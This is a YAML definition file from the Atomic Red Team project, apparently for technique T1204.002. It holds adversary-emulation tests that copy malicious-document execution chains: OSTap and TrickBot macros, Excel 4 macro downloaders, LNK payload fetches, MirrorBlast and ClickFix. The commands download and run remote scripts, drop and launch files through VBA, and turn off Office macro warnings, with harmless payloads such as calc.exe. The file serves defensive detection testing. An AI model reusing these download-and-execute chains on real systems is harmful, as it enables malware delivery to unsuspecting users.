atomic-red-team/atomics/T1204.002/T1204.002.yaml
2025-11-01 01:27:30 +00:00


attack_technique: T1204.002
display_name: 'User Execution: Malicious File'
atomic_tests:
- name: OSTap Style Macro Execution
  auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff
  description: |
    This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
    Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
    This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns.
    References:
    https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
  supported_platforms:
  - windows
  input_arguments:
    jse_path:
      description: |
        Path for the macro to write out the "malicious" .jse file
      type: string
      default: C:\Users\Public\art.jse
    ms_product:
      description: Maldoc application Word or Excel
      type: string
      default: Word
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft #{ms_product} must be installed
    prereq_command: |
      try {
        New-Object -COMObject "#{ms_product}.Application" | Out-Null
        $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
        Stop-Process -Name $process
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
      Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
    cleanup_command: |
      Remove-Item #{jse_path} -ErrorAction Ignore
    name: powershell
- name: OSTap Payload Download
  auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
  description: |
    Uses cscript //E:jscript to download a file
  supported_platforms:
  - windows
  input_arguments:
    script_file:
      description: File to execute jscript code from
      type: path
      default: '%TEMP%\OSTapGet.js'
    file_url:
      description: URL to retrieve file from
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
  executor:
    command: |
      echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile('ostapout.txt', 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
      cscript //E:Jscript #{script_file}
    cleanup_command: |
      del #{script_file} /F /Q >nul 2>&1
    name: command_prompt
- name: Maldoc choice flags command execution
  auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
  description: |
    This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched.
    Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
  supported_platforms:
  - windows
  input_arguments:
    ms_product:
      description: Maldoc application Word or Excel
      type: string
      default: Word
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft #{ms_product} must be installed
    prereq_command: |
      try {
        New-Object -COMObject "#{ms_product}.Application" | Out-Null
        $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
        Stop-Process -Name $process
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
      Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
    name: powershell
- name: OSTAP JS version
  auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
  description: |
    Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
    Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
  supported_platforms:
  - windows
  input_arguments:
    jse_path:
      description: jse file to execute with wscript
      type: path
      default: C:\Users\Public\art.jse
    ms_product:
      description: Maldoc application Word or Excel
      type: string
      default: Word
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft #{ms_product} must be installed
    prereq_command: |
      try {
        New-Object -COMObject "#{ms_product}.Application" | Out-Null
        $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
        Stop-Process -Name $process
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
      Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
    name: powershell
- name: Office launching .bat file from AppData
  auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
  description: Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened.
  supported_platforms:
  - windows
  input_arguments:
    bat_path:
      description: Path to malicious .bat file
      type: string
      default: $("$env:temp\art1204.bat")
    ms_product:
      description: Maldoc application Word or Excel
      type: string
      default: Word
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft #{ms_product} must be installed
    prereq_command: |
      try {
        New-Object -COMObject "#{ms_product}.Application" | Out-Null
        $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
        Stop-Process -Name $process
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c #{bat_path} `", vbNormalFocus)`n"
      Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
    cleanup_command: |
      Remove-Item #{bat_path} -ErrorAction Ignore
      Get-Process | Where-Object { $_.MainModule.FileName -like "*calculator*" } | Stop-Process
    name: powershell
- name: Excel 4 Macro
  auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
  description: |
    This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
    VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
    A note regarding this module: by default, this module will pull the current username from the system and place it into the macro. If
    you'd like to utilize the "=GET.WORKSPACE(26)" method that many maldoc authors use, you will need to ensure that the User Name associated
    with Excel matches that of the local system. This username can be found under Files -> Options -> Username
  supported_platforms:
  - windows
  input_arguments:
    download_url:
      description: Download URL
      type: string
      default: "https://live.sysinternals.com/procexp.exe"
    uname:
      description: Username for pathing
      type: string
      default: $env:Username
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft Excel must be installed
    prereq_command: |
      try {
        New-Object -COMObject "Excel.Application" | Out-Null
        Stop-Process -Name "Excel"
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
  executor:
    command: |
      $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
      $fname1 = "$env:TEMP\procexp.exe"
      if (Test-Path $fname) {
        Remove-Item $fname
        Remove-Item $fname1
      }
      $xlApp = New-Object -COMObject "Excel.Application"
      $xlApp.Visible = $True
      $xlApp.DisplayAlerts = $False
      $xlBook = $xlApp.Workbooks.Add()
      $sheet = $xlBook.Excel4MacroSheets.Add()
      if ("#{uname}" -ne "") {
        $sheet.Cells.Item(1,1) = "#{uname}"
      } else {
        $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
      }
      $sheet.Cells.Item(2,1) = "procexp.exe"
      $sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
      $sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
      $sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
      $sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
      $sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
      $sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
      $sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
      $sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
      $sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
      $sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
      $sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
      $sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
      $sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
      $sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
      $sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
      $sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
      $sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
      $sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
      $sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
      $sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
      $sheet.Cells.Item(23,1) = "=HALT()"
      $sheet.Cells.Item(1,1).Name = "runme"
      $xlApp.Run("runme")
      $xlApp.Quit()
      [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
      [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
      [System.GC]::Collect()
      [System.GC]::WaitForPendingFinalizers()
      Remove-Variable xlBook
      Remove-Variable xlApp
    cleanup_command: |
      Stop-Process -Name "procexp*" -ErrorAction Ignore
      Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
      Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
    name: powershell
- name: Headless Chrome code execution via VBA
  auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a
  description: |
    This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local
    webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver
    and pull down the script and execute it. By default the payload will execute calc.exe on the system.
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Microsoft Word must be installed
    prereq_command: |
      try {
        $wdApp = New-Object -COMObject "Word.Application"
        Stop-Process -Name "winword"
        exit 0 } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
  - description: |
      Google Chrome must be installed
    prereq_command: |
      try {
        $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Google Chrome manually to meet this requirement"
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
    name: powershell
    cleanup_command: |
      Stop-Process -name mshta
- name: Potentially Unwanted Applications (PUA)
  auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295
  description: |
    The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to the EICAR test virus file, but is classified as a Potentially Unwanted Application (PUA) instead of a virus (i.e. it is not actually malicious, but is flagged as a PUA to verify anti-PUA protection).
  supported_platforms:
  - windows
  input_arguments:
    pua_url:
      description: url to PotentiallyUnwanted.exe
      type: url
      default: "http://amtso.eicar.org/PotentiallyUnwanted.exe"
    pua_file:
      description: path to PotentiallyUnwanted.exe
      type: path
      default: "$env:TEMP/PotentiallyUnwanted.exe"
  executor:
    name: powershell
    elevation_required: false
    command: |
      Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
      & "#{pua_file}"
    cleanup_command: |
      Stop-Process -name PotentiallyUnwanted
      Remove-Item #{pua_file} -ErrorAction Ignore
- name: Office Generic Payload Download
  auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c
  description: |
    This Test uses a VBA macro to launch Powershell which will download a file from a user defined web server.
    Required input arguments are c2_domain and file_name
    Execution is handled by [Invoke-MalDoc](https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
    Example for c2 server located at 127.0.0.1 for the file test.txt which is nested below the parent directory in the tests/my-test folder
    Example input args for a file in the root directory: c2_domain = 127.0.0.1, file_name = test.txt
  supported_platforms:
  - windows
  input_arguments:
    macro_path:
      description: |
        Location of file which will be converted to a VBA macro
      type: path
      default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt
    c2_domain:
      description: |
        This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory.
      type: url
      default:
    c2_parent_directory:
      description: |
        Parent directory where you have the "malicious" file on the c2_domain server.
        Will default to the root directory. Forward slashes are not needed at the beginning or end of the directory path
      type: path
      default: ""
    file_name:
      description: |
        "Malicious" file to be downloaded.
        This required file needs to be placed on the user provided c2 domain
        Example file can be found at PathToAtomicsFolder/T1204.002/src/test9-example-payload.txt
      type: string
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/test9-example-payload.txt
    ms_product:
      description: |
        Maldoc application Word or Excel
      type: string
      default: Word
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Destination c2_domain name or IP address must be set to a running HTTP server.
    prereq_command: |
      if ("#{c2_domain}") { exit 0 } else { exit 1 }
    get_prereq_command: |
      Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service"
  - description: |
      Microsoft #{ms_product} must be installed
    prereq_command: |
      try {
        New-Object -COMObject "#{ms_product}.Application" | Out-Null
        $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
        Stop-Process -Name $process
        exit 0
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
  executor:
    name: powershell
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
      $macroCode = Get-Content "#{macro_path}" -Raw
      $URL = "#{c2_domain}" + "/" + "#{c2_parent_directory}"
      $macroCode = $macroCode -replace 'serverPath', $URL -replace 'fileName', "#{file_name}"
      Invoke-MalDoc -macroCode $macroCode -officeProduct "#{ms_product}"
    cleanup_command: |
      Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore
- name: LNK Payload Download
  auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f
  description: This lnk file invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
  supported_platforms:
  - windows
  executor:
    command: |
      Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
      $file1 = "$env:Temp\test10.lnk"
      Start-Process $file1
      Start-Sleep -s 10
      taskkill /IM a.exe /F
    cleanup_command: |-
      $file1 = "$env:Temp\test10.lnk"
      $file2 = "$env:Temp\a.exe"
      Remove-Item $file1 -ErrorAction Ignore
      Remove-Item $file2 -ErrorAction Ignore
    name: powershell
- name: Mirror Blast Emulation
  auto_generated_guid: 24fd9719-7419-42dd-bce6-ab3463110b3c
  description: |
    Emulates the JS -> MSI chain of the MirrorBlast T505 campaign by executing an xlsm file designed.
    Requires the 32 bit version of Office to run. [MirrorBlast Campaign Analysis](https://blog.morphisec.com/explosive-new-mirrorblast-campaign-targets-financial-companies)
  supported_platforms:
  - windows
  executor:
    command: |-
      Cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
      New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force | Out-Null
      & '.\Excel 2016.lnk' "PathToAtomicsFolder\T1204.002\bin\mirrorblast_emulation.xlsm"
    cleanup_command: reg delete "HKCU\SOFTWARE\Microsoft\Office\16.0\Excel\Security" /v "VBAWarnings" /f
    name: powershell
- name: ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell
  auto_generated_guid: 3f3120f0-7e50-4be2-88ae-54c61230cb9f
  description: |
    Simulates a ClickFix-style campaign by adding a malicious entry to the RunMRU registry key that launches `mshta.exe` with a remote payload.
    This technique relies on user interaction (Win+R + Enter) to trigger execution.
    Used in social engineering campaigns that aim to bypass traditional startup methods.
    Reference: https://www.netskope.com/blog/lumma-stealer-fake-captchas-new-techniques-to-evade-detection
  supported_platforms:
  - windows
  executor:
    command: |-
      Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -Value '"C:\Windows\System32\mshta.exe" http://localhost/hello6.hta'
    cleanup_command: |-
      Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "atomictest" -ErrorAction SilentlyContinue
    name: powershell
- name: Simulate Click-Fix via Downloaded BAT File
  auto_generated_guid: 22386853-f68d-4b50-a362-de235127c443
  description: Simulates user execution of a BAT file downloaded from the Atomic Red Team GitHub repository. This test represents T1204.002 - User Execution via Malicious File. The BAT file performs harmless terminal output to simulate a "fix" operation.
  supported_platforms:
  - windows
  input_arguments:
    url:
      description: URL to download the BAT file from
      type: url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/click-fix.bat
    outfile:
      description: Path where the BAT file will be saved
      type: path
      default: $env:TEMP\click-fix.bat
  executor:
    command: |
      $url = "#{url}"
      $outfile = "#{outfile}"
      Invoke-WebRequest -Uri $url -OutFile $outfile -UseBasicParsing
      $process = Start-Process -FilePath $outfile -PassThru -WindowStyle Normal
      $process.Id | Out-File "$env:TEMP\click-fix-pid.txt"
    cleanup_command: |
      if (Test-Path "$env:TEMP\click-fix-pid.txt") {
        # $pid is a read-only automatic variable in PowerShell, so the saved id is read into its own variable
        $procId = Get-Content "$env:TEMP\click-fix-pid.txt"
        Stop-Process -Id $procId -Force -ErrorAction SilentlyContinue
        Remove-Item "$env:TEMP\click-fix-pid.txt" -ErrorAction SilentlyContinue
      }
      Remove-Item "#{outfile}" -ErrorAction SilentlyContinue
    name: powershell
    elevation_required: false